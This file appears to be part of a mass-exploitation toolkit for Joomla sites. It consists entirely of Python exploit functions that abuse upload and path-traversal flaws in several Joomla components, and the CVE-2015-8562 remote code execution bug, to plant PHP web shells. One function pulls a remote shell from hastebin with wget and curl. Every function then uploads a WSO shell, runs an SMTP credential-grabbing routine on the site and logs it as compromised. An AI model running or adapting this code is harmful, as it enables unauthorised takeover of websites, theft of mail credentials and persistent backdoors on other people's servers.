def Exploit(site): try: PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'} fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')} requests.post( 'http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php', data=PostData, files=fil, timeout=10, headers=Headers) Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg', timeout=10, headers=Headers) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/tmp/vuln.php.xxxjpg?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
def Exploit(site): try: requests.post('http://' + site + '/administrator/components/com_redmystic/chart/' 'ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/' 'chart/tmp-upload-images/vuln.php', headers=Headers, timeout=10) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
def Exploit(site): try: requests.post( 'http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&' 'owner=component&bid=1&qqfile=/../../../vuln.php', data=payloadshell, timeout=10, headers=Headers) CheckSh = requests.get('http://' + site + '/components/com_b2jcontact/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckSh.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_b2jcontact/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/components/com_b2jcontact/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
def Exploit(site): try: PostData = {'path': '../../../tmp/'} fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')} requests.post( 'http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem' '/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
def exploit(url): try: target_url = url + '/index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): execute_backdoor( url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend execute_backdoor( url, 'system(\'echo "Shell Access!<?php {}(base64_decode("{}")); ?>" > vuln.php\');' .format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7')) execute_backdoor( url, 'system(\'echo "<?php fwrite(fopen("images/sh3.php","w+"),file_get_contents("https://hastebin.com/raw/oqikagison")); ?>" > c.php\');' ) execute_backdoor( url, 'system(\'wget https://hastebin.com/raw/oqikagison -O images/sh.php\');' ) execute_backdoor( url, 'system(\'curl -O https://hastebin.com/raw/oqikagison;mv oqikagison images/sh2.php\');' ) CheckShell = requests.get('http://' + url + '/vuln.php', headers=Headers, timeout=10) checkIndex = requests.get('http://' + url + '/vuln.htm', headers=Headers, timeout=10) requests.get('http://' + url + '/cc.php', headers=Headers, timeout=10) CheckShell2 = requests.get('http://' + url + '/images/up3.php', headers=Headers, timeout=10) CheckShell3 = requests.get('http://' + url + '/images/up2.php', headers=Headers, timeout=10) CheckShell4 = requests.get('http://' + url + '/images/up.php', headers=Headers, timeout=10) if 'Shell Access!' in str(CheckShell.content): WSo = wsoShellUploaderModule.UploadWso(url + '/vuln.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/vuln.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' in str(CheckShell2.content): WSo = wsoShellUploaderModule.UploadWso( url + '/images/up3.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up3.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up3.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' in str(CheckShell3.content): WSo = wsoShellUploaderModule.UploadWso( url + '/images/up2.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up2.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up2.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' in str(CheckShell4.content): WSo = wsoShellUploaderModule.UploadWso(url + '/images/up.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) if 'Vuln!!' in str(checkIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(url + '/vuln.htm\n') return printModule.returnYes(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') else: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') except: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla')
def Exploit(site): try: Checker = requests.get('http://' + site + "/components/com_foxcontact/foxcontact.php", timeout=10, headers=Headers) if 'Restricted access' in str(Checker.content): GotCid = requests.get( 'http://' + site + '/index.php?option=com_foxcontact&view=invalid', timeout=10, headers=Headers) cids = re.findall('foxcontact&Itemid=(.*?)" >', str(GotCid.content)) flag = 0 for cid in cids: cid = str(cid) URLS = [ "/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../{}" .format(cid, cid, 'neko.php'), "/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}" "?cid={}&mid={}&qqfile=/../../{}".format( cid, cid, cid, 'neko.php'), "/index.php?option=com_foxcontact&view=loader&type=uploader&" "owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../{}" .format(cid, cid, cid, cid, 'neko.php'), "/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../{}" .format(cid, cid, 'neko.php') ] for path in URLS: Exp = site + path requests.post('http://' + Exp, data=payloadshell, timeout=10, headers=Headers) SH = requests.get('http://' + site + '/components/com_foxcontact/neko.php', timeout=10, headers=Headers) if 'neko!!' in str(SH.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_foxcontact/neko.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_foxcontact/neko.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/components/com_foxcontact/neko.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) flag = 1 break else: pass if flag == 0: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla') else: return printModule.returnYes(site, 'N/A', 'Com_FoxContact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')